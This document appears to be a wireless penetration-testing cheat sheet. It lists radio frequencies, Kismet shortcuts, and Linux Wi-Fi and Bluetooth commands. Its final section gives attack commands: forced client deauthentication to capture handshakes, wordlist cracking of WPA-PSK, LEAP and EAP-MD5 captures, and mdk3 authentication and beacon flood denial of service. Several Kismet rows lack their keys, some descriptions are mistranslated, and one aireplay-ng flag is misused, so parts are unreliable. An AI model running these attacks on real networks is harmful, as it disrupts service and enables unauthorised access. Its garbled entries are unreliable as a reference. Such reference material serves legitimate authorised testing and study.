# Wireless

## Wireless

#### Frequency chart

| Technology           | Frequency                                                                      |
| -------------------- | ------------------------------------------------------------------------------ |
| RFID                 | <p>120-150 kHz (LF)</p><p>13.56 MHz (HF)</p><p>433 MHz (UHF)</p>               |
| Keyless Entry        | <p>315 MHz (N. Am)</p><p>433.92 MHz (Europe, Asia)</p>                         |
| Cellular (US)        | <p>698-894 MHz</p><p>1710-1755 MHz</p><p>1850-1910 MHz</p><p>2110-2155 MHz</p> |
| GPS                  | 1227.60, 1575.42 MHz                                                           |
| L Band               | 1-2 GHz                                                                        |
| 802.15.4 (ZigBee)    | <p>868 MHz (Europe)</p><p>915 MHz (US, Australia)</p>                          |
| 802.15.1 (Bluetooth) | 2.4-2.4835 GHz                                                                 |
| 802.11 b/g           | 2.4 GHz                                                                        |
| 802.11a              | 5.0 GHz                                                                        |
| 802.11 n             | 2.4/5.0 GHz                                                                    |
| C Band               | 4-8 GHz                                                                        |
| Ku Band              | 12-18 GHz                                                                      |
| K Band               | 18-26.5 GHz                                                                    |
| Ka Band              | 26.5-40 GHz                                                                    |

#### FCC ID lookup

```
https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm
```

#### Database of frequencies

```
http://www.radioreference.com/apps/db/
```

#### Source of Kismet

| **Command** | **Explanation**                                       |
| ----------- | ----------------------------------------------------- |
| e           | Kismet servers                                        |
| h           | Help                                                  |
|             | View full screen                                      |
| n           | Current network number                                |
|             | Remove the sound                                      |
|             | Network details                                       |
| t           | Tag or remove the network tag                         |
|             | Linking network list                                  |
| g           | Grouping of tagged networks                           |
|             | Display the power levels of the wireless network card |
|             | Remove the group, the current group                   |
| d           | Show displayable settings                             |
| c           | Show current network users                            |
|             | Packet rate chart                                     |
| L           | Lock the channel in the selected channel              |
| a           | Show network statistics                               |
| H           | Back to the normal channel                            |
| p           | Receive packet type                                   |
| +/-         | Expand/collapse groups                                |
| f           | Network Center                                        |
| CTRL+L      | Display the page again                                |
| w           | Tracking alerts                                       |
| Q           | Exit Kismet                                           |
| X           | Close the popup window                                |

#### Wi-Fi commands in Linux

| Command            | Explanation                                   |
| ------------------ | --------------------------------------------- |
| iwconfig           | Show wireless interface settings              |
| rfkill list        | Show Wi-Fi problems (blocked radios)          |
| rfkill unblock all | Turn on Wi-Fi                                 |
| airodump-ng mon0   | Monitoring of all interfaces                  |

#### Connect to an insecure network

```
iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0
```

#### Connect to WEP

```
iwconfig ath0 essid $SSID key $KEY
ifconfig ath0 up
dhclient ath0
```

#### Connect to WPA-PSK

```
iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0
```

#### Connect to WPA-Enterprise

```
iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0
```

### Bluetooth on Linux

| Command                                                        | Description                          |
| -------------------------------------------------------------- | ------------------------------------ |
| hciconfig hci0 up                                              | Turn on Bluetooth interface          |
| hcitool -i hci0 scan --flush --all                             | Search for Bluetooth enabled devices |
| sdptool browse BD\_ADDR                                        | List of open services                |
| hciconfig hci0 name "NAME" class 0x520204 piscan               | Select as discoverable               |
| pand -K                                                        | Delete pand session                  |

### Testing Wi-Fi networks in Linux

#### Start monitor mode interface

```
airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH
```

#### Capture client handshake attack

```
airodump-ng -c $CH --bssid $AP -w file ath0 # Capture traffic
aireplay-ng -0 10 -a $AP -c $CH ath0 # Force client de-auth
```

#### Brute force handshake attack

```
aircrack-ng -w wordlist capture.cap # WPA-PSK
asleap -r capture.cap -w dict.asleap # LEAP
eapmd5pass -r capture.cap -w wordlist # EAP-MD5
```

#### DoS attack

```
mdk3 int a -a $AP # Auth flood
mdk3 int b -c $CH # Beacon flood
```
